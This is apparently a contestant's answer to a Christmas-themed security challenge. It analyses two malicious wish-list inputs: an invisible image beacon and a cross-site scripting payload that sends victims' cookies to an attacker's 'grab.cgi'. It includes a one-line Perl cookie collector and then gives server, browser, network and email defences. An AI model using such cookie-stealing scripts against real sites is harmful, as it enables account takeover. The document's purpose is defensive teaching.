By Mark Davis1. What is the purpose of the first malicious wish text, and how does it work?
I would expect it to
be an attempt to ascertain whether or not the web application accepts and returns HTML data. Using an image link to do so may go unchecked by log watch software and also provides evidence that external websites can be
accessed without problem. The image properties are of no consequence (0x0).
It works by asking whatever application is loading the page to retrieve the remotely hosted image. The bumblesnowmonster owner can
check his web server logs to see if the image was loaded.
2. What is the purpose of the second malicious wish text, and how does it work?
It would appear it is a classic attempt to use cross-site
scripting (XSS) in an attack, obviously i can't know what is contained in the cgi application, but since it is parsing the user's cookie for the "santa application" domain (whatever it is), and that the cgi
application is called "grab", i assume it is an attempt to grab the user's cookie data, which may contain sensitive information like username and password.
How does it work? .. well obviously i can't
say how the grab.cgi application works exactly, but i assume it is something like this:
|
$usercookiedata = | $ENV{QUERY_STRING}|;
|
From here, the cgi app can write the cookie contents to disk or send an
email etc etc. The retrieved cookie values are for the USER of the santa site, so if it was an authorised administrative user, then those credentials will allow the malicious bumblesnowmonster cgi app owner to possibly
gain admin privileges and change any values that other admins can in the santa application (eg naughty/nice). Definitely an act worthy of getting coal in their stocking!
3. How could Hermey and Rudolph thwart
the first and second types of attacks by altering the Web application? Alternatively, how could they stop these attacks by changing the configuration of the analyst elves' browsers?
Server-side:
A combination of all these would certainly stop the above attack:
a. Configure the web server to deny access to the administrative interface from external sources (eg apache deny from directive), and only allow
access from the internal network or even specific IPs.
b.VALIDATE all form data and strip all the HTML tags from the data, so that HTML tags are rendered ineffecive, eg "<" turned into < ,
this will stop the image being grabbed, and will just have the img text printed.
b. You could also use regular expressions in the application code, and limit entered data to be numeric or alphabetic, excluding
anything not "0 - 9, A - z", this will also prevent any HTML tags from getting in, more effective but more time consuming (unless you already have a nice script for doing it :) ) than the above solution.
c. Could also install parsing filters at the web server application level, that filter out "malicious" (or whtever you want) data, but really, can cause problems, so I would say not entirely necessary if
the above steps have been implemented.
Client Side:
a. If possible, turn off javascript (and other scripting like vbscript), but still allow cookies.
b. Use the latest version of their browser.
c. Configure the analyst elve's browsers so that they don't load images haha :)
d. Delete cookies each time the browser is closed, for good measure.
Network:
a. Prevent the elve's from accessing the
internet in the first place, so they can only browse (and hence their browsers can only access) the internal network. Accompished by any number of means but esentially implementing a firewall.
b. Mail server..
have email scanned to remove html tags for the mail destined for processing by the analysts. (eg MailScanner)
4. Beyond these browser-based attacks, Hermey was also concerned about attackers submitting similar
elements in children's wish lists submitted via e-mail. What are two different methods for defeating such attacks by altering an e-mail reader's configuration?
a. Turn OFF all scripting support for the email client
b. Do NOT display HTML emails! make it plain TEXT only.
- Mark Davis
|
|
